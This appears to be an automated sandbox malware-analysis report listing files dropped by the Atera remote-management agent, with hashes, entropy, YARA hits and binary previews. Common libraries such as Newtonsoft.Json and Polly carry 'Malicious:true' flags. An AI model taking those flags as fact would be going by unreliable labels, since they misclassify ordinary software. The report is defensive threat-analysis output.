                                                                                                                                                                                                                                                                                              SSDEEP:12:MMHdGGsVZrdSJ9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdArdEtPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                              MD5:547C772B1DEA0A1E8030F6ED5BE2AF75
                                                                                                                                                                                                                                                                                              SHA1:6F4A95B2EA3342D7B4D61C715C7FC076EB6A2DC0
                                                                                                                                                                                                                                                                                              SHA-256:C35A8B8AF7ECCB9BA68B129FF7F46EB1279229D637049F40761A697E9DFCD5A4
                                                                                                                                                                                                                                                                                              SHA-512:0F77B35AC34C8E4655F7F1F4EBF1A86AA11F96C689E632DA8BE8A17CC69A9292878E0058DD9EA5FF7315DCDD8B34489F06E6DCBB365569E3BB80E81373792FC0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.ini

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhUv:Wm
                                                                                                                                                                                                                                                                                              MD5:27AD88A291FC97D97FD773334DE4E487
                                                                                                                                                                                                                                                                                              SHA1:04B5DB46F05E02E2EC94B8A0A3447EA41FA4089D
                                                                                                                                                                                                                                                                                              SHA-256:4E7F8923223CB32E5D376EBC0C5361DD97DB201848590C4877D586723142B49F
                                                                                                                                                                                                                                                                                              SHA-512:5B21A87E19D4E3D7A14DC05C815B8D06500695360AAD1F54D2D3713CF05F646E9E7D559551BFE2CC2CDEBCE29A1991BC80AB2B11DDF79A4033897B34DCA40521
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=17.14

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):93232
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.196023578677744
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:5Svbne0Q41qJ3n8JMW+0KcBLQhZV5M+5Nn0komH7yAfRS7Hxh:5S8UMW+BV5M+5Nn0kom/RSz
                                                                                                                                                                                                                                                                                              MD5:BD539D820C8163E9E86E59B99ADEDD22
                                                                                                                                                                                                                                                                                              SHA1:FF367525BA06F8B9E611A82CFD57411BA4FBD1FE
                                                                                                                                                                                                                                                                                              SHA-256:04C547E06CA956DB2B929CC2B6B695A649FF0F82C52E56F2677A887E7D9616DE
                                                                                                                                                                                                                                                                                              SHA-512:FEBB46D70A5466C85087BD4E42FBA81682CF398739F7EFEF43982C830CCFD6FCEC4613F0B5542951A463161C891EE9F378CD4D2B15B1659DCBC0E15A34BA677F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.........." ..0..:..........^X... ...`....... ...............................F....`..................................X..O....`..8............D..0(...........V............................................... ............... ..H............text...d8... ...:.................. ..`.rsrc...8....`.......<..............@..@.reloc...............B..............@..B................@X......H.......|f..X............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tM...r...p((..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):671744
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.893336561237734
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:fBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36Q:fBA/ZTvQD0XY0AJBSjRlXP36Q
                                                                                                                                                                                                                                                                                              MD5:C3689CE3217DD82D57880C31B89A9437
                                                                                                                                                                                                                                                                                              SHA1:051E913AAC2F4345D2364894C4154ABD287DB3FD
                                                                                                                                                                                                                                                                                              SHA-256:9367CB126577146DB3B9C26DD00DD71C7B228F30C0FA6C698FAC26CAEAB14D43
                                                                                                                                                                                                                                                                                              SHA-512:3471C18A4D79ED7C5FD268B25904EA2D6F3A15551B6517BD23ACD8ADE84FFF301492EC6C8861624E6F2699CDF9046DA2A8BAF351FB88EFC3AD4673A42AE57F7B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......Ee....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller.zip

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):833993
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999644881255343
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:24576:peRqTiLR3omp/AAzr5nxL2CP+sZ4tgMfQo:p8nLR4WYA72CPPoKo
                                                                                                                                                                                                                                                                                              MD5:9B1F97A41BFB95F148868B49460D9D04
                                                                                                                                                                                                                                                                                              SHA1:768031D5E877E347A249DFDEAB7C725DF941324B
                                                                                                                                                                                                                                                                                              SHA-256:09491858D849212847E4718D6CC8F2B1BC3CAA671CEB165CF522290B960262E4
                                                                                                                                                                                                                                                                                              SHA-512:9C8929A78CB459F519ACE48DB494D710EFD588A19A7DBEA84F46D02563CC9615DB8AA78A020F08ECA6FA2B99473D15C8192A513B4DF8073AEF595040D8962AE4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PK..-.....;9rX.9..........9...AgentPackageInternalPoller/AgentPackageInternalPoller.exe....0Z.......U........ee..Th8.............t.v.g....g......M.........c..K.`|.'1.W.g.;.W+.e.....D.."|...]-:.To.:.`B(.E{.T.?..z...&.....g.....1.,km8.....Y......WZm;..!.....k.....iA...~.zK..EW'.....p.A....Q6.~S......A.......6....h=C3N0y.$i....M...N....C......I.....UCp.p....x..WQ!.p..>.'N%.2Z.l.R8./...%Ew..T..yy.....q...U.nqH......".......n.6M..P.:t...t1..r...!9Z.N.X.s8.3.9V.a...m8....LpWS..O.8..R6..O.l....e|(..F...Og.h.0..,..Z.H....Rl..L.N.9.\...."4..%..A.<."..Iy...:..GBw_1......3.y.p...a...*...l..._.FI.Z.....+.L.....]Y.K|RM.Pf..in.........93+2.QMH.t......<...3.. ....2..!....t..)).I\.qw1.'..J...J3".K'rt.h.f+.I.7...q.MK......V.._!Q.].w..au.[.brv.T&..Lfm./..J.$.m...... t.u..uQ...L...\...M.Ihp.rG.J..C".....d.....;z..d....L.p.r.c7....q[2.e.........!(....Ld.....M..9...M....>EN&dY.]....>QUJ..N.+d.cr..].D.o.........?o.~@....@..D[...5.C.eP.a.....;..:.._v.....R

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):219696
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.943430076853408
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:It3Mf3ZwYUPEpbPwygJQetg0+BpU3I0toxhGf:2MfJPpjYN8hI
                                                                                                                                                                                                                                                                                              MD5:01807774F043028EC29982A62FA75941
                                                                                                                                                                                                                                                                                              SHA1:AFC25CF6A7A90F908C0A77F2519744F75B3140D4
                                                                                                                                                                                                                                                                                              SHA-256:9D4727352BF6D1CCA9CBA16953EBD1BE360B9DF570FD7BA022172780179C251E
                                                                                                                                                                                                                                                                                              SHA-512:33BD2B21DB275DC8411DA6A1C78EFFA6F43B34AFD2F57959E2931AA966EDEA46C78D7B11729955879889CBE8B81A8E3FB9D3F7E4988E3B7F309CBD1037E0DC02
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{..e.........."...0..&..........:D... ...`....@.. ..............................h)....`..................................C..O....`..d............2..0(...........B............................................... ............... ..H............text....$... ...&.................. ..`.rsrc...d....`.......(..............@..@.reloc...............0..............@..B.................D......H........@..$.......f.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ...x )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*..{....*..{ ...*..{!...*r.(......}......} .....}!...*..0..Y........u........L.,G(.....{.....{....o....,/(.....{ ....{ ...o....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):541
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.097123194334321
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:MMHdGp2VvOF9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdsIOvPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                              MD5:D0EFB0A6D260DBE5D8C91D94B77D7ACD
                                                                                                                                                                                                                                                                                              SHA1:E33A8C642D2A4B3AF77E0C79671EAB5200A45613
                                                                                                                                                                                                                                                                                              SHA-256:7D38534766A52326A04972A47CACA9C05E95169725D59AB4A995F8A498678102
                                                                                                                                                                                                                                                                                              SHA-512:A3F1CFF570201B8944780CF475B58969332C6AF9BEA0A6231E59443B05FC96DF06A005FF05F78954DBE2FEC42DA207F6D26025AA558D0A30A36F0DF23A44A35C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.ini

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhXWp:WBc
                                                                                                                                                                                                                                                                                              MD5:DFDD2EB77BBB74518BAD98519A857D41
                                                                                                                                                                                                                                                                                              SHA1:5F4F91D73EA620CDF0E5AC458E80B71412B1BB9F
                                                                                                                                                                                                                                                                                              SHA-256:7655078305CC5B4F62569EF9868E1B04FCC491D33FDAD1F8E4610C038BCBAC8D
                                                                                                                                                                                                                                                                                              SHA-512:481CDA97C03294EBAB036F99727828983C8D0E4C137AF05FDEA7FD296D11378904BACCE2D58D44F932A0BF7F2A30A9B44F4CBC05E253F132B1EF641F648C8DF0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=23.8

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):52272
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.300719339270839
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:5i8fXCGsSVh/2ixXxKFArYCJdshn9xvlOaEpYinAMxCuMr:5FaM2gS1y2F9Ob7HxCr
                                                                                                                                                                                                                                                                                              MD5:9467F653980C1C37E4C64811BA27C976
                                                                                                                                                                                                                                                                                              SHA1:68130FABBB50EAF5CFE2C355BA13B303DD373FB6
                                                                                                                                                                                                                                                                                              SHA-256:821847799A2B7B3A6EC20BA61388AC87707D9C6865BD904A44DE5B033BD2EF29
                                                                                                                                                                                                                                                                                              SHA-512:E72B7802256053589D889B2B7E74A2B53F328289A12CC0D4930D66410D00585C67B2C434512473CD2E74C8F2CB7685C2C34FCFC3DBA4A52399532CEB04153597
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ..............................t.....`.................................2...O.......................0(..........@...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................f.......H...........x.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{ ...*"..} ...*..{!...*"..}!...*..{"...*"..}"...*..{#...*"..}#...*..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):96816
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1801131806578455
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:hJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxwx:hQUm2H5KTfOLgxFJjE50vksVUfPvCI
                                                                                                                                                                                                                                                                                              MD5:F1B2303DD7E152BA70F3537EDB2E9638
                                                                                                                                                                                                                                                                                              SHA1:7E359D4B9011449DABB7F8236F14851A346B5028
                                                                                                                                                                                                                                                                                              SHA-256:8EE8B304339B6F87E79B117F605375AFFFCBABA290A1B41BB6B3C1A40E46767C
                                                                                                                                                                                                                                                                                              SHA-512:A4DD48F1AFF528DADF9974ADA1740CE785823FB584F55191D008158FCFB11F9ADAD8EFF992B8FF761058706C1717E28FBC9C337CF39D4EE4FFAA529501CB3188
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ..............................l.....`.................................(f..O.......8............R..0(...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LastSyncDevicesTime.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):19
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.1952959344962175
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MxXQvTFn:MRQn
                                                                                                                                                                                                                                                                                              MD5:66338403FD5EDB15023F5261AF4251F6
                                                                                                                                                                                                                                                                                              SHA1:E23827B2EEE6DC426E98C7C57B2F612CB6D73744
                                                                                                                                                                                                                                                                                              SHA-256:15DEA28F3C0A1D9DE97F6F358E979FAB0C6C329B52211AFA68B25CA58365C319
                                                                                                                                                                                                                                                                                              SHA-512:12E1DE4E4275012D0781D5F90131FCED4A3EFB299A956D71FB5AF7C2D8D3CF86DDE3F0592C4A76490EE4589545C623DC161F2A0B84DA1240C3C6786606110BD5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:06/01/2025 06:59:13

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LiteDB.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):499760
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.056862695710082
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:HXv781Hpx+GfCdLr/jd9yyeEAHweiPofdyz7qd352SW8CdykAfqO:/76BfC5avfdyvc2SN
                                                                                                                                                                                                                                                                                              MD5:3CE7E73DB6F575A0D382DDAA8E1A3C10
                                                                                                                                                                                                                                                                                              SHA1:031C13652C540CA7F798D141D7C3333FB1C71618
                                                                                                                                                                                                                                                                                              SHA-256:692185C37DB7505250E58CC55D6707FCB099315A7FF319A9CC92FD99C5F0EEA7
                                                                                                                                                                                                                                                                                              SHA-512:5270E772613864BD223F31F89CFA500E56E7863967C58C503F92E193AF8C8CAF934B7755868EC21585A38E8D6D186A2DC5528A805A62A0BFA56B59E6506BFF81
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,..........." ..0..p............... ........... ....................................`.................................?...O....................x..0(..........t...T............................................ ............... ..H............text....n... ...p.................. ..`.rsrc................r..............@..@.reloc...............v..............@..B................s.......H.......(d...(...........................................................{J...*..{K...*V.(L.....}J.....}K...*...0..A........u;.......4.,/(M....{J....{J...oN...,.(O....{K....{K...oP...*.*.*. 8..z )UU.Z(M....{J...oQ...X )UU.Z(O....{K...oR...X*...0..b........r...p......%..{J......%q>....>...-.&.+...>...oS....%..{K......%q?....?...-.&.+...?...oS....(T...*2.(U...oV...*..-.rE..psW...z.(U....oX...oV...*:...(....(Y...*:...(....(Y...*N..{Z....o...+(Y...*z.{[....{Z....{\....s]...(^...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710192
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960733432365752
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:bBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUk:bBjk38WuBcAbwoA/BkjSHXP36RMGt
                                                                                                                                                                                                                                                                                              MD5:2A9525F27730CBF9E7145AADE4CDA830
                                                                                                                                                                                                                                                                                              SHA1:A6A99E02599656DE1C7F51B02C84BBA8AAE0346D
                                                                                                                                                                                                                                                                                              SHA-256:29D0073080509DB7F3F20C47980A1347CC4139C5F2E26C9C160AE67CE5EECB6E
                                                                                                                                                                                                                                                                                              SHA-512:DDDEEC7AA9D3F9E6187718564AE1A447FCAB12EC2DCBD26EDD87217B4815C274A6BAF90A027766FCC94815C762ED9BFA8D0DEF6C1B2F84279DED9C66852D381E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ...... .....`....................................O.......................0(.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):277040
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.190626027944278
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:rSOIleacQlBh2YQMoIBhpq01TLvlj9b6gRZNsRYA:suQlBAMW0BvltxZ6B
                                                                                                                                                                                                                                                                                              MD5:4ECF017FD71CC84A4CBAB7507B8634BE
                                                                                                                                                                                                                                                                                              SHA1:2343F37490F9A11F5F0878A1553F0FAF504FE062
                                                                                                                                                                                                                                                                                              SHA-256:871D9403D045F94FC433907E49B68894764FCAF81E12FBDE2AC7A08642DDA32C
                                                                                                                                                                                                                                                                                              SHA-512:5FCB9BDA9C857BA1AD2EC0B19AD109AC54BAC91B8F8F00968560623C8AFD01FAEE1078F7C76010C7526A37C46EE0DB74A0E0DB151186F8FB220105F7091FA69B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............'... ...@....... ..............................>.....@..................................&..O....@..L...............0(...`.......%..T............................................ ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......................@..B.................&......H.......L[......................`%......................................^.{....,.(:...z..}.....*^.{....,.(:...z..}.....*"..(?...*"..(@...*...0..,.......sp......}........q...s7...sj....{.....(....*.0..-.......sr......}........s...s7....ss....{.....(....*....0..(.......st......}........u...s7.....{.....(....*.0..'.......sv......}........w...s7...sj.....(....*B...ss.....(....*......(....*.0..'.......sx......}........y...s7...sj.....(....*F...ss......(....*....0..Z..........}....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):149552
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.059724018456156
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:o/S+nps5/3oat9QrwQmUgs0giOBDQntBBGBBKBUkBBXBBgBBFBUABU1BB0BBBBgB:o/S+nps5/3f9Qrdd5EtBBGBBKBUkBBXh
                                                                                                                                                                                                                                                                                              MD5:2FF31980FD256EF1B1E143D4699BB727
                                                                                                                                                                                                                                                                                              SHA1:608A21DA2B243E63DAD9E36EE84BC38C921F8E77
                                                                                                                                                                                                                                                                                              SHA-256:F34AD6FB7847A85ADBE1492C783233A8A32BB5E96972FA3738538CE20513F682
